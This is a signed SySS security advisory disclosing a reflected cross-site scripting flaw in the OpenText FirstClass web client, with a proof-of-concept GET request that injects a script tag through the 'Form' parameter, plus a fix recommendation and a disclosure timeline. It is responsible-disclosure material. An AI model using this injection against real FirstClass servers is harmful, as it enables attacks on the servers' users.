-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2016-011
Product: FirstClass
Manufacturer: Open Text Corporation
Affected Version(s): Unknown
Tested Version(s): Unknown
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: Not fixed
Manufacturer Notification: 2016-02-04
Solution Date: -
Public Disclosure: 2016-06-10
CVE Reference: Not assigned
Author of Advisory: Christian Kistner (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

FirstClass is a Groupware by Open Text[1] for multiple platforms
including a web client for accessing.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

SySS GmbH identified that it is possible to inject JavaScript code
via the parameter "Form".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

GET /FCP/DeskTop000000000000000000000?Form=calendar-toolbar.html<script>alert(1)</script> HTTP/1.1
Host: [host]
Cookie: SessID=[sessionid]

The server responses by a status code 400 (Bad Request), and reflects
the vector in the responded JSON object.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Implement a server-side validation of all client-provided data.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2016-01-22: Vulnerability discovered
2016-02-04: Manufacturer Notification
2016-03-18: Vulnerability reported to manufacturer
2016-06-10: Public release of security advisory according to the SySS
            Responsible Disclosure Policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] OpenText FirstClass
    http://www.opentext.com/what-we-do/products/specialty-technologies/firstclass

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

Security vulnerability found by Christian Kistner of the SySS GmbH.

E-Mail: christian.kistner [at] syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Christian_Kistner.asc
Key ID: 0x87A0D373
Key Fingerprint: E22C 4D21 8B81 98C5 F2B9 DA6F 4BF1 1528 87A0 D373

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of  this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJXWqnSAAoJEEvxFSiHoNNzo8gP/3rLanuzFtHJAepzFStSfeD4
w8O0P/kpV6mGpYSsHydBoaV7rbj17NiU8mRXaaTGK0JlemjSrxPq7rXuNtdfYdId
K4EjBH4F2jySRWenb56rtFpiMY3wKC4gHHtNDi9VVd89PpDdi4LYDWgjsRX3TYnI
V5AQyGWqpMg8PPPKhA2j/IAb2w19ZHPjxw1MItHO/7yUvCIswOpa6r0QxiijO4Yi
Fsjno1Qjsw5X8xxA29+vCDB0z+9BvykThMzge7uIn+fjmNv3o+E9Kwbdjg3J89k5
nAw469boM7f7qhJSZR1JrjHfdSNh8gN6M1uL+nwEiBdJtzV21VSmCBpf63nKUvuo
ZZ7z882HJASvB8frTT8eR/P26xjtOSaB7QHtIG8vxDbMSaUCE59A4P6vZlSV5woL
VbvYAFHd9fD6AOANoC4DHMlX/cuLLXTU2U4J518U1+0Izgu2JiQI2oJdxmwljJii
Kjee5U3+rvm56PSpOb5DSxlKBy2QgpY+QUIJe7uRngxGiO7PlI/AVFVmF5o2QdP/
DNc9XxeYL5CzqakjFlvf/TfO5zAweK+dm6/9uI3mShRJQjj76R6d0E27TrRNgvkn
dyRS8nSmpOsyWG9ZiSBz4gXLpH7dOqzVGS1gNiFbEvm/ed6RpwmdWq/LUt2YaUj4
WEuwVdhgiygFz8zwBnFc
=iXGb
-----END PGP SIGNATURE-----